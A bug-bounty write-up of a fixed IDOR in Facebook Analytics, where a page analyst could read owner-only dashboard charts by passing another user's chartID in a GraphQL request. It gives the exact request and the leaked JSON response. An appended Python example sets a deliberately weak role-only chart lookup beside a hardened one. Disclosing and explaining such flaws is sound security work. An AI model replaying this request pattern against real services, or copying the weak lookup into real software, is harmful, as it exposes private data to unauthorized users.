Disclose Private Dashboard Chart's name and data in Facebook Analytics
AI Summary
An IDOR vulnerability in Facebook Analytics allows users with analyst roles to access private dashboard charts by manipulating the chartID parameter in GraphQL requests, disclosing chart names and data intended only for the dashboard owner. The vulnerability exploits insufficient access control on a sub-option (chart info) within the main dashboard feature.
Entities
Facebook
Sarmad Hassan
AnalyticsChartDeleteMutation
AnalyticsStoredAggregationChart
Bugreader | Sarmad Hassan | Published On: 07 May 2020

Type: IDOR | Program: Facebook | Web | Severity: LOW | Status: VALID

Introduction

In Facebook Analytics, you can create custom dashboards, which you can view from Dashboards. Use custom dashboards to create a customized view, or to see the information that matters to you most in one place. You can also set a dashboard's visibility by ticking the "Private" check mark, which means only the owner of the dashboard can see it and its contents.

Description

It is possible to disclose the chart name and its data for a private dashboard, by any user who has a role on the entity or page (for example the analyst role), using an IDOR bug in the parameter called "chartID".

Impact

A page analyst could view analytics charts where the page admin had set the visibility to "owner only".

Reproduction Steps

Step 1

Request (sent with the analyst's access token):

POST /graphql?locale=user HTTP/1.1
Host: graph.facebook.com

access_token=Analyst_ACCESS_TOKEN&fb_api_req_friendly_name=AnalyticsChartDeleteMutation&variables={"chartID":"<admin private chart ID>"}&doc_id=1297068037067230

Response:

{
  "data": {
    "node": {
      "__typename": "AnalyticsStoredAggregationChart",
      "chartId": "<admin private chart ID>",
      "chartType": "BREAKDOWN_TABLE",
      "chartQueries": [
        {
          "__typename": "AnalyticsAggregationQuerySpec",
          "aggregationMetric": "UNIQUE_USERS",
          "aggregationMetricParams": [],
          "aggregationPeriod": "RANGE",
          "breakdowns": ["$fb.age"],
          "dateRange": {"type": "LAST_28_DAYS", "since_iso_date": null, "until_iso_date": null},
          "displayName": null,
          "eventName": "fb_pages_post_reaction",
          "orderingColumns": [],
          "orderingType": "DESCENDING",
          "limit": 0,
          "segment": {
            "__typename": "AnalyticsAdhocFilterSetListing",
            "name": null,
            "serializedFilter": "{\"event_rules\":[],\"demographic_rules\":[],\"device_rules\":[],\"percentile_rules\":[],\"user_property_rules\":[],\"web_param_rules\":[]}",
            "filter_json": "{}"
          },
          "tag": "CHART"
        }
      ],
      "description": "",
      "title": "<private chart name>",
      "segmentBehavior": "USE_LOCAL",
      "chartAnnotations": [],
      "errorBounds": [],
      "goal": null,
      "id": "id"
    }
  },
  "extensions": {"is_final": true}
}

My Notes

* When it comes to logical bugs like IDOR, always check the sub-options, because sometimes developers protect only the main option and forget about the sub-option. That is exactly the case here: "Chart info" was a sub-option of the main option "Dashboard".

Timeline

Sarmad    17 Feb 2020  Initial Report
Facebook  26 Feb 2020  Report Triaged
Facebook  08 Mar 2020  Report Fixed
Sarmad    08 Mar 2020  Fixed Confirmed
Facebook  02 Apr 2020  Bounty awarded
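The note above describes the root cause as an authorization check applied to the main option (the dashboard) but not to its sub-option (the chart). The example below is added here to illustrate that point; it is not Facebook's code and does not describe how Facebook Analytics is implemented. The data model (Dashboard, Chart, a (page, user) role table), the sample records and the function names are all constructed for the illustration. It shows a chart lookup that only checks the viewer's page-level role beside one that resolves the chart's parent dashboard and reuses the dashboard's own owner-only rule before returning any chart field, the title included.

```python
"""Added example: authorize a dashboard chart through its parent dashboard.

Constructed, hypothetical model (not Facebook's code). A chart is a
"sub-option" of a dashboard: the dashboard carries the visibility flag,
so any read of the chart must resolve the dashboard first and apply the
owner-only rule there. A role check on the page alone is not enough.
"""
from dataclasses import dataclass
from typing import Dict, Tuple


class ChartNotVisible(Exception):
    """Raised for both 'no such chart' and 'not allowed to see it', so the
    response does not confirm that a guessed chart ID exists."""


@dataclass(frozen=True)
class Dashboard:
    dashboard_id: str
    page_id: str      # entity the dashboard belongs to
    owner_id: str     # user who created it
    private: bool     # "Private" check mark: owner-only


@dataclass(frozen=True)
class Chart:
    chart_id: str
    dashboard_id: str
    title: str
    data: Dict[str, int]


# Constructed sample data standing in for the backing store.
DASHBOARDS: Dict[str, Dashboard] = {
    "dash-pub": Dashboard("dash-pub", "page-1", "admin-1", private=False),
    "dash-priv": Dashboard("dash-priv", "page-1", "admin-1", private=True),
}
CHARTS: Dict[str, Chart] = {
    "chart-100": Chart("chart-100", "dash-pub", "Reactions by age", {"18-24": 40, "25-34": 55}),
    "chart-200": Chart("chart-200", "dash-priv", "private chart name", {"18-24": 7, "25-34": 9}),
}
# (page_id, user_id) -> role held on that entity (constructed)
ROLES: Dict[Tuple[str, str], str] = {
    ("page-1", "admin-1"): "ADMIN",
    ("page-1", "analyst-1"): "ANALYST",
}


def has_role_on_page(page_id: str, user_id: str) -> bool:
    return (page_id, user_id) in ROLES


def fetch_chart_unchecked(chart_id: str, viewer_id: str) -> dict:
    """Weak pattern: only the page-level role is checked, so any analyst
    can read charts belonging to a dashboard marked owner-only."""
    chart = CHARTS.get(chart_id)
    if chart is None:
        raise ChartNotVisible(chart_id)
    dashboard = DASHBOARDS[chart.dashboard_id]
    if not has_role_on_page(dashboard.page_id, viewer_id):
        raise ChartNotVisible(chart_id)
    return {"chartId": chart.chart_id, "title": chart.title, "data": chart.data}


def can_view_dashboard(dashboard: Dashboard, viewer_id: str) -> bool:
    """The dashboard's own rule: private means owner only, otherwise any
    user with a role on the page."""
    if dashboard.private:
        return viewer_id == dashboard.owner_id
    return has_role_on_page(dashboard.page_id, viewer_id)


def fetch_chart(chart_id: str, viewer_id: str) -> dict:
    """Hardened pattern: resolve the chart's parent dashboard and apply its
    visibility rule before returning any chart field (title included)."""
    chart = CHARTS.get(chart_id)
    if chart is None:
        raise ChartNotVisible(chart_id)
    dashboard = DASHBOARDS[chart.dashboard_id]
    if not can_view_dashboard(dashboard, viewer_id):
        raise ChartNotVisible(chart_id)
    return {"chartId": chart.chart_id, "title": chart.title, "data": chart.data}


def chart_visible_to(chart_id: str, viewer_id: str) -> bool:
    """Audit helper: True if fetch_chart would return the chart to viewer_id."""
    try:
        fetch_chart(chart_id, viewer_id)
        return True
    except ChartNotVisible:
        return False


if __name__ == "__main__":
    # The analyst gets the private chart's title from the weak lookup ...
    print(fetch_chart_unchecked("chart-200", "analyst-1")["title"])
    # ... but not from the hardened one; the owner still does.
    print(chart_visible_to("chart-200", "analyst-1"), chart_visible_to("chart-200", "admin-1"))
```

Two design points: every accessor for a sub-object (chart, chart query, annotation) goes through the same `can_view_dashboard` rule rather than carrying its own copy, so a visibility setting on the dashboard cannot be bypassed by reaching a child object directly; and the denied and not-found cases raise the same error, so a response does not confirm that a chart ID is valid.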